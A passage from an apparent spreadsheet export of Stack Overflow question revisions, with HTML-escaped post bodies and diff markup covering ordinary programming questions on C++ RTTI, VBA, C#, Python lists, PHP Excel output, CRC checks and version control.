    {_x000D_
        std::string sub;_x000D_
        iss &amp;gt;&amp;gt; sub;_x000D_
        std::cout &amp;lt;&amp;lt; &lt;span class="hljs-string"&gt;"Substring: "&lt;/span&gt; &amp;lt;&amp;lt; sub &amp;lt;&amp;lt; std::endl;_x000D_
    } &lt;span class="hljs-keyword"&gt;while&lt;/span&gt; (iss);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am familiar with C++ RTTI, and find the concept interesting.&lt;/p&gt; _x000D_
 &lt;p&gt; Still there exist a lot of more ways to abuse it than to use it correctly (the RTTI-switch dread comes to mind). As a developer, I found (and used) only two viable uses for it (more exactly, one and a half).&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Could you share some of the ways RTTI is a viable solution to a problem, with example code/pseudo-code included?&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Note: The aim is to have a repository of viable examples a junior developer can consult, criticize and learn from.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am familiar with C++ RTTI, and find the concept interesting.&lt;/p&gt; _x000D_
 &lt;p&gt; Still there exist a lot of more ways to abuse it than to use it correctly (the RTTI-switch dread comes to mind). As a developer, I found (and used) only two viable uses for it (more exactly, one and a half).&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Could you share some of the ways RTTI is a viable solution to a problem, with example code/pseudo-code included?&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Note: The aim is to have a repository of viable examples a junior developer can consult, criticize and learn from.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;Edit:&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-add"&gt; You'll find below code using C++ RTTI&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;// A has a virtual destructor (i.e. is polymorphic)_x000D_
// B has a virtual destructor (i.e. is polymorphic)_x000D_
// B does (or does not ... pick your poison) inherits from A_x000D_
_x000D_
void doSomething(A * a)_x000D_
{_x000D_
   // typeid()::name() returns the "name" of the object (not portable)_x000D_
   std::cout &amp;lt;&amp;lt; "a is [" &amp;lt;&amp;lt; typeid(*a).name() &amp;lt;&amp;lt; "]"&amp;lt;&amp;lt; std::endl ;_x000D_
_x000D_
   // the dynamic_cast of a pointer to another will return NULL is_x000D_
   // the conversion is not possible_x000D_
   if(B * b = dynamic_cast&amp;lt;B *&amp;gt;(a))_x000D_
   {_x000D_
      std::cout &amp;lt;&amp;lt; "a is b" &amp;lt;&amp;lt; std::endl ;_x000D_
   }_x000D_
   else_x000D_
   {_x000D_
      std::cout &amp;lt;&amp;lt; "a is NOT b" &amp;lt;&amp;lt; std::endl ;_x000D_
   }_x000D_
}_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; HI&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;I&lt;/span&gt; have &lt;span class="diff-delete"&gt;a access databse&lt;/span&gt; with many tables. &lt;span class="diff-delete"&gt;what i am trying to do is get&lt;/span&gt; the &lt;span class="diff-delete"&gt;user to give an input&lt;/span&gt;.&lt;span class="diff-delete"&gt; eg salary&lt;/span&gt;.&lt;span class="diff-delete"&gt; then i go and&lt;/span&gt; check the &lt;span class="diff-delete"&gt;whole database&lt;/span&gt; for &lt;span class="diff-delete"&gt;that field to check&lt;/span&gt; if it is &lt;span class="diff-delete"&gt;empty&lt;/span&gt; for &lt;span class="diff-delete"&gt;any record&lt;/span&gt; and &lt;span class="diff-delete"&gt;if it is empty&lt;/span&gt; i &lt;span class="diff-delete"&gt;would like&lt;/span&gt; to update &lt;span class="diff-delete"&gt;it by 99999. Also is it possible to write a report saying for which records the updates have been made&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; I am looking for a sample vba code&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; THanks&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;###Related Question &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/239833/how-to-checkupdate-a-row-of-values-based-on-a-single-column-header"&gt;&lt;span class="diff-delete"&gt;how-to-checkupdate-a-row-of-values-based-on-a-single-column-header&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; HI&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;i&lt;/span&gt; have &lt;span class="diff-add"&gt; database&lt;/span&gt; with many tables. &lt;span class="diff-add"&gt;In&lt;/span&gt; the &lt;span class="diff-add"&gt;first table i have a field called status&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre class="lang-vb s-code-block hljs vbnet"&gt;&lt;code&gt;&lt;span class="diff-add"&gt;table &lt;span class="hljs-number"&gt;1&lt;/span&gt;_x000D_
idno   name    status_x000D_
&lt;span class="hljs-number"&gt;111&lt;/span&gt;     hjghf     yes_x000D_
&lt;span class="hljs-number"&gt;225&lt;/span&gt;      hjgjj     no_x000D_
&lt;span class="hljs-number"&gt;345&lt;/span&gt;      hgj       yes_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; other tables could have same idno with different fields&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I want to&lt;/span&gt; check the &lt;span class="diff-add"&gt;status&lt;/span&gt; for &lt;span class="diff-add"&gt;each id no and&lt;/span&gt; if it is &lt;span class="diff-add"&gt;yes then&lt;/span&gt; for &lt;span class="diff-add"&gt;that id number in all tables for all null&lt;/span&gt; and &lt;span class="diff-add"&gt;blank fields&lt;/span&gt; i &lt;span class="diff-add"&gt;want&lt;/span&gt; to update &lt;span class="diff-add"&gt;them as 111111&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; I am looking for a sample vba code&lt;span class="diff-add"&gt; for this which i can adapt.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Thanks&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is it possible to easily embed ActiveX controls in Java application? Is it worth it&lt;span class="diff-delete"&gt;?&lt;/span&gt; In my next project I should either use existing activex in Java app or have to reimplement everything from scratch, so I'm wondering what will be less hassle.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is it possible to easily embed ActiveX controls in Java application? Is it worth it&lt;span class="diff-add"&gt;.&lt;/span&gt; In my next project I should either use existing activex in Java app or have to reimplement everything from scratch, so I'm wondering what will be less hassle.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Marko</t>
  </si>
  <si>
    <t>rogerdpack</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How can I launch a application using C#?&lt;/p&gt; _x000D_
 &lt;p&gt; Requirements: MUST work on XP and VISTA?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How can I launch a application using C#?&lt;/p&gt; _x000D_
 &lt;p&gt; Requirements: MUST work on XP and VISTA?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I have seen a sample from DinnerNow.net sampler that only works in vista?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I needed to create a list of lists in Python, so I typed the following:&lt;span class="diff-delete"&gt; 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lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;myList = [[1] * 4] * 3_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The list looked like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;[[1, 1, 1, 1], [1, 1, 1, 1], [1, 1, 1, 1]]  _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Then I changed one of the innermost values:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;myList[0][0] = 5_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Now my list looks like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;[[5, 1, 1, 1], [5, 1, 1, 1], [5, 1, 1, 1]]  _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; which is not what I wanted or expected. Can someone please explain what's going on, and how to get around it?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I needed to create a list of lists in Python, so I typed the following:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;myList = [[1] * 4] * 3_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The list looked like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;[[1, 1, 1, 1], [1, 1, 1, 1], [1, 1, 1, 1]]  _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Then I changed one of the innermost values:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;myList[0][0] = 5_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Now my list looks like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;[[5, 1, 1, 1], [5, 1, 1, 1], [5, 1, 1, 1]]  _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; which is not what I wanted or expected. Can someone please explain what's going on, and how to get around it?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am reading in dat files into a byte array. For some reason, the people who generate these files put about a half meg's worth of useless null bytes at the end of the file. Anybody know a quick way to trim these off the end?&lt;/p&gt; _x000D_
 &lt;p&gt; First thought was to start at the end of the array and iterate backwards until I found something other than a null, then copy everything up to that point, but I wonder if there isn't a better way.&lt;/p&gt; _x000D_
 &lt;p&gt; To answer some questions:&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Are&lt;/span&gt; you sure the 0 bytes are definitely in the file, rather than there being a bug in the file reading code? Yes, I am certain of that.&lt;/p&gt; _x000D_
 &lt;p&gt; Can you definitely trim all trailing 0s? Yes.&lt;/p&gt; _x000D_
 &lt;p&gt; Can there be any 0s in the rest of the file? Yes, there can be 0's other places, so, no, I can't start at the beginning and stop at the first 0.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Ok,&lt;/span&gt; I am reading in dat files into a byte array. For some reason, the people who generate these files put about a half meg's worth of useless null bytes at the end of the file. Anybody know a quick way to trim these off the end?&lt;/p&gt; _x000D_
 &lt;p&gt; First thought was to start at the end of the array and iterate backwards until I found something other than a null, then copy everything up to that point, but I wonder if there isn't a better way.&lt;/p&gt; _x000D_
 &lt;p&gt; To answer some questions:&lt;span class="diff-add"&gt; Are&lt;/span&gt; you sure the 0 bytes are definitely in the file, rather than there being a bug in the file reading code? Yes, I am certain of that.&lt;/p&gt; _x000D_
 &lt;p&gt; Can you definitely trim all trailing 0s? Yes.&lt;/p&gt; _x000D_
 &lt;p&gt; Can there be any 0s in the rest of the file? Yes, there can be 0's other places, so, no, I can't start at the beginning and stop at the first 0.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Kevin</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is there a .dll version of the &lt;a href="http://t3.dotgnu.info/blog/php/messy-programmers-beware.html" rel="nofollow noreferrer"&gt;inclued&lt;/a&gt; extension for &lt;a href="http://uk2.php.net/manual/en/intro.inclued.php" rel="nofollow noreferrer"&gt;PHP&lt;/a&gt;? The manual's link for &lt;a href="http://pecl4win.php.net/ext.php/php_inclued.dll" rel="nofollow noreferrer"&gt;Inclued on PECL4WIN&lt;/a&gt; doesn't help. I don't have a compiler to build my own DLL.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is there a .dll version of the &lt;a href="http://t3.dotgnu.info/blog/php/messy-programmers-beware.html" rel="nofollow noreferrer"&gt;inclued&lt;/a&gt; extension for &lt;a href="http://uk2.php.net/manual/en/intro.inclued.php" rel="nofollow noreferrer"&gt;PHP&lt;/a&gt;? The manual's link for &lt;a href="http://pecl4win.php.net/ext.php/php_inclued.dll" rel="nofollow noreferrer"&gt;Inclued on PECL4WIN&lt;/a&gt; doesn't help. I don't have a compiler to build my own DLL.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; NOTE: The spelling "inclued" is correct!&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Ferruccio</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm using IXMLDOM in MSXML 6 to build an XML file in a C++ MFC application. Is there a way to see the contents of the xml document while it is in memory?&lt;/p&gt; _x000D_
 &lt;p&gt; For example, an XPATH query is failing about halfway through creating the file. How would I view the entire contents of the xml doc?&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks&lt;span class="diff-delete"&gt;!&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm using IXMLDOM in MSXML 6 to build an XML file in a C++ MFC application. Is there a way to see the contents of the xml document while it is in memory?&lt;/p&gt; _x000D_
 &lt;p&gt; For example, an XPATH query is failing about halfway through creating the file. How would I view the entire contents of the xml doc?&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks&lt;span class="diff-add"&gt;, Steve&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Steve Duitsman</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I always hear that programmers try to pick the right tool for the job. I've never programmed in Java, so I was wondering What are its benefits? Why is it so popular? What should I use it for?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I always hear that programmers try to pick the right tool for the job. I've never programmed in Java, so I was wondering What are its benefits? Why is it so popular? What should I use it for?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I just program recreationally. Is there anything about it that makes it particularly fun??&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Sophie</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Here's the code. Not much to it. Create a new workbook, add a blank worksheet to it, dump it to the browser.&lt;/p&gt; _x000D_
 &lt;pre class="lang-php s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-meta"&gt;&amp;lt;?php&lt;/span&gt;_x000D_
&lt;span class="hljs-keyword"&gt;include&lt;/span&gt;(&lt;span class="hljs-string"&gt;"Spreadsheet/Excel/Writer.php"&lt;/span&gt;);_x000D_
_x000D_
&lt;span class="hljs-variable"&gt;$xls&lt;/span&gt; = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; Spreadsheet_Excel_Writer();_x000D_
_x000D_
&lt;span class="hljs-variable"&gt;$sheet&lt;/span&gt; = &lt;span class="hljs-variable"&gt;$xls&lt;/span&gt;-&amp;gt;addWorksheet(&lt;span class="hljs-string"&gt;'At a Glance'&lt;/span&gt;);_x000D_
_x000D_
&lt;span class="hljs-variable"&gt;$colNames&lt;/span&gt; = &lt;span class="hljs-keyword"&gt;array&lt;/span&gt;(&lt;span class="hljs-string"&gt;'Foo'&lt;/span&gt;, &lt;span class="hljs-string"&gt;'Bar'&lt;/span&gt;);_x000D_
&lt;span class="hljs-variable"&gt;$sheet&lt;/span&gt;-&amp;gt;writeRow(&lt;span class="hljs-number"&gt;0&lt;/span&gt;, &lt;span class="hljs-number"&gt;0&lt;/span&gt;, &lt;span class="hljs-variable"&gt;$colNames&lt;/span&gt;, &lt;span class="hljs-variable"&gt;$colHeadingFormat&lt;/span&gt;);_x000D_
 _x000D_
&lt;span class="hljs-keyword"&gt;for&lt;/span&gt;(&lt;span class="hljs-variable"&gt;$i&lt;/span&gt;=&lt;span class="hljs-number"&gt;1&lt;/span&gt;; &lt;span class="hljs-variable"&gt;$i&lt;/span&gt;&amp;lt;=&lt;span class="hljs-number"&gt;10&lt;/span&gt;; &lt;span class="hljs-variable"&gt;$i&lt;/span&gt;++)_x000D_
{_x000D_
    &lt;span class="hljs-variable"&gt;$row&lt;/span&gt; = &lt;span class="hljs-keyword"&gt;array&lt;/span&gt;( &lt;span class="hljs-string"&gt;"foo &lt;span class="hljs-subst"&gt;$i&lt;/span&gt;"&lt;/span&gt;, &lt;span class="hljs-string"&gt;"bar &lt;span class="hljs-subst"&gt;$i&lt;/span&gt;"&lt;/span&gt;);_x000D_
_x000D_
    &lt;span class="hljs-variable"&gt;$sheet&lt;/span&gt;-&amp;gt;writeRow(&lt;span class="hljs-variable"&gt;$rowNumber&lt;/span&gt;++, &lt;span class="hljs-number"&gt;0&lt;/span&gt;, &lt;span class="hljs-variable"&gt;$row&lt;/span&gt;);_x000D_
}_x000D_
_x000D_
header (&lt;span class="hljs-string"&gt;"Expires: "&lt;/span&gt; . gmdate(&lt;span class="hljs-string"&gt;"D,d M Y H:i:s"&lt;/span&gt;) . &lt;span class="hljs-string"&gt;" GMT"&lt;/span&gt;);_x000D_
header (&lt;span class="hljs-string"&gt;"Last-Modified: "&lt;/span&gt; . gmdate(&lt;span class="hljs-string"&gt;"D,d M Y H:i:s"&lt;/span&gt;) . &lt;span class="hljs-string"&gt;" GMT"&lt;/span&gt;);_x000D_
header (&lt;span class="hljs-string"&gt;"Cache-Control: no-cache, must-revalidate"&lt;/span&gt;);_x000D_
header (&lt;span class="hljs-string"&gt;"Pragma: no-cache"&lt;/span&gt;);_x000D_
&lt;span class="hljs-variable"&gt;$xls&lt;/span&gt;-&amp;gt;send(&lt;span class="hljs-string"&gt;"test.xls"&lt;/span&gt;);_x000D_
&lt;span class="hljs-variable"&gt;$xls&lt;/span&gt;-&amp;gt;close();_x000D_
&lt;span class="hljs-meta"&gt;?&amp;gt;&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The issue is that I get the following error when I actually open the file with Excel:&lt;/p&gt; _x000D_
 &lt;pre class="lang-php s-code-block hljs"&gt;&lt;code&gt;File &lt;span class="hljs-built_in"&gt;error&lt;/span&gt;:  data may have been lost._x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Even stranger is the fact that, despite the error, the file seems fine. Any data I happen to be writing is there.&lt;/p&gt; _x000D_
 &lt;p&gt; Any ideas on how to get rid of this error?&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Edit&lt;/span&gt;&lt;/strong&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; I've updated&lt;/span&gt; the code &lt;span class="diff-delete"&gt;example&lt;/span&gt; to better illustrate the &lt;span class="diff-delete"&gt;issue&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Here's the code. Not much to it. Create a new workbook, add a blank worksheet to it, dump it to the browser.&lt;/p&gt; _x000D_
 &lt;pre class="lang-php s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-meta"&gt;&amp;lt;?php&lt;/span&gt;_x000D_
&lt;span class="hljs-keyword"&gt;include&lt;/span&gt;(&lt;span class="hljs-string"&gt;"Spreadsheet/Excel/Writer.php"&lt;/span&gt;);_x000D_
_x000D_
&lt;span class="hljs-variable"&gt;$xls&lt;/span&gt; = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; Spreadsheet_Excel_Writer();_x000D_
_x000D_
&lt;span class="hljs-variable"&gt;$sheet&lt;/span&gt; = &lt;span class="hljs-variable"&gt;$xls&lt;/span&gt;-&amp;gt;addWorksheet(&lt;span class="hljs-string"&gt;'At a Glance'&lt;/span&gt;);_x000D_
_x000D_
&lt;span class="hljs-variable"&gt;$colNames&lt;/span&gt; = &lt;span class="hljs-keyword"&gt;array&lt;/span&gt;(&lt;span class="hljs-string"&gt;'Foo'&lt;/span&gt;, &lt;span class="hljs-string"&gt;'Bar'&lt;/span&gt;);_x000D_
&lt;span class="hljs-variable"&gt;$sheet&lt;/span&gt;-&amp;gt;writeRow(&lt;span class="hljs-number"&gt;0&lt;/span&gt;, &lt;span class="hljs-number"&gt;0&lt;/span&gt;, &lt;span class="hljs-variable"&gt;$colNames&lt;/span&gt;, &lt;span class="hljs-variable"&gt;$colHeadingFormat&lt;/span&gt;);_x000D_
 _x000D_
&lt;span class="hljs-keyword"&gt;for&lt;/span&gt;(&lt;span class="hljs-variable"&gt;$i&lt;/span&gt;=&lt;span class="hljs-number"&gt;1&lt;/span&gt;; &lt;span class="hljs-variable"&gt;$i&lt;/span&gt;&amp;lt;=&lt;span class="hljs-number"&gt;10&lt;/span&gt;; &lt;span class="hljs-variable"&gt;$i&lt;/span&gt;++)_x000D_
{_x000D_
    &lt;span class="hljs-variable"&gt;$row&lt;/span&gt; = &lt;span class="hljs-keyword"&gt;array&lt;/span&gt;( &lt;span class="hljs-string"&gt;"foo &lt;span class="hljs-subst"&gt;$i&lt;/span&gt;"&lt;/span&gt;, &lt;span class="hljs-string"&gt;"bar &lt;span class="hljs-subst"&gt;$i&lt;/span&gt;"&lt;/span&gt;);_x000D_
_x000D_
    &lt;span class="hljs-variable"&gt;$sheet&lt;/span&gt;-&amp;gt;writeRow(&lt;span class="hljs-variable"&gt;$rowNumber&lt;/span&gt;++, &lt;span class="hljs-number"&gt;0&lt;/span&gt;, &lt;span class="hljs-variable"&gt;$row&lt;/span&gt;);_x000D_
}_x000D_
_x000D_
header (&lt;span class="hljs-string"&gt;"Expires: "&lt;/span&gt; . gmdate(&lt;span class="hljs-string"&gt;"D,d M Y H:i:s"&lt;/span&gt;) . &lt;span class="hljs-string"&gt;" GMT"&lt;/span&gt;);_x000D_
header (&lt;span class="hljs-string"&gt;"Last-Modified: "&lt;/span&gt; . gmdate(&lt;span class="hljs-string"&gt;"D,d M Y H:i:s"&lt;/span&gt;) . &lt;span class="hljs-string"&gt;" GMT"&lt;/span&gt;);_x000D_
header (&lt;span class="hljs-string"&gt;"Cache-Control: no-cache, must-revalidate"&lt;/span&gt;);_x000D_
header (&lt;span class="hljs-string"&gt;"Pragma: no-cache"&lt;/span&gt;);_x000D_
&lt;span class="hljs-variable"&gt;$xls&lt;/span&gt;-&amp;gt;send(&lt;span class="hljs-string"&gt;"test.xls"&lt;/span&gt;);_x000D_
&lt;span class="hljs-variable"&gt;$xls&lt;/span&gt;-&amp;gt;close();_x000D_
&lt;span class="hljs-meta"&gt;?&amp;gt;&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The issue is that I get the following error when I actually open the file with Excel:&lt;/p&gt; _x000D_
 &lt;pre class="lang-php s-code-block hljs"&gt;&lt;code&gt;File &lt;span class="hljs-built_in"&gt;error&lt;/span&gt;:  data may have been lost._x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Even stranger is the fact that, despite the error, the file seems fine. Any data I happen to be writing is there.&lt;/p&gt; _x000D_
 &lt;p&gt; Any ideas on how to get rid of this error?&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; ###Edit&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I've modified&lt;/span&gt; the code &lt;span class="diff-add"&gt;sample&lt;/span&gt; to better illustrate the &lt;span class="diff-add"&gt;problem. I don't think the first sample was a legit test&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You have several maintenance branches for existing releases of your software. Some developers are making direct changes in the maintenance branches, and merging periodically into the trunk. Now comes an extensive refactoring in the trunk codeline, scheduled for an upcoming major release. But this makes the maintenance branches fundamentally incompatible with the code in the trunk, as they might depend on code that does not exist anymore, for example.&lt;/p&gt; _x000D_
 &lt;p&gt; How do you deal with this situation in &lt;span class="diff-delete"&gt;practise&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You have several maintenance branches for existing releases of your software. Some developers are making direct changes in the maintenance branches, and merging periodically into the trunk. Now comes an extensive refactoring in the trunk codeline, scheduled for an upcoming major release. But this makes the maintenance branches fundamentally incompatible with the code in the trunk, as they might depend on code that does not exist anymore, for example.&lt;/p&gt; _x000D_
 &lt;p&gt; How do you deal with this situation in &lt;span class="diff-add"&gt;practice&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm working with a small &lt;span class="diff-delete"&gt;FAT32&lt;/span&gt; filesystem, and I want to generate CRC values for &lt;span class="diff-delete"&gt;individual&lt;/span&gt; XML files which store configuration information. In case the data changes or is corrupted, I want to be able to check the CRC to determine that the file is still in &lt;span class="diff-delete"&gt;its&lt;/span&gt; original state.&lt;/p&gt; _x000D_
 &lt;p&gt; The question is, how do I put the CRC value into the file, without changing the CRC value of the file itself? I can think of a couple solutions, but I think there must be a fairly standard solution for this issue.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm working with a small &lt;span class="diff-add"&gt;FAT16&lt;/span&gt; filesystem, and I want to generate CRC values for &lt;span class="diff-add"&gt;indidual&lt;/span&gt; XML files which store configuration information. In case the data changes or is corrupted, I want to be able to check the CRC to determine that the file is still in &lt;span class="diff-add"&gt;it's&lt;/span&gt; original state.&lt;/p&gt; _x000D_
 &lt;p&gt; The question is, how do I put the CRC value into the file, without changing the CRC value of the file itself? I can think of a couple solutions, but I think there must be a fairly standard solution for this issue.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Danny</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What are the correct version numbers for &lt;code&gt;&lt;span class="diff-delete"&gt;C#&lt;/span&gt;&lt;/code&gt;? What came out when? Why can't I find any answers about &lt;code&gt;&lt;span class="diff-delete"&gt;C# 3.5&lt;/span&gt;&lt;/code&gt;?&lt;/p&gt; _x000D_
 &lt;p&gt; [This question is primarily to aid those who are searching for an answer using an incorrect version number, e.g. &lt;code&gt;&lt;span class="diff-delete"&gt;"C# 3.5"&lt;/span&gt;&lt;/code&gt;. At the time of this writing, there are several questions tagged with "c#3.5". I'm shortly going to correct this, as recommended by the answer to this question about terminology. The hope is that anyone failing to find an answer with the wrong version number will find &lt;em&gt;this&lt;/em&gt; answer and then search again with the right version number.]&lt;/p&gt; _x000D_
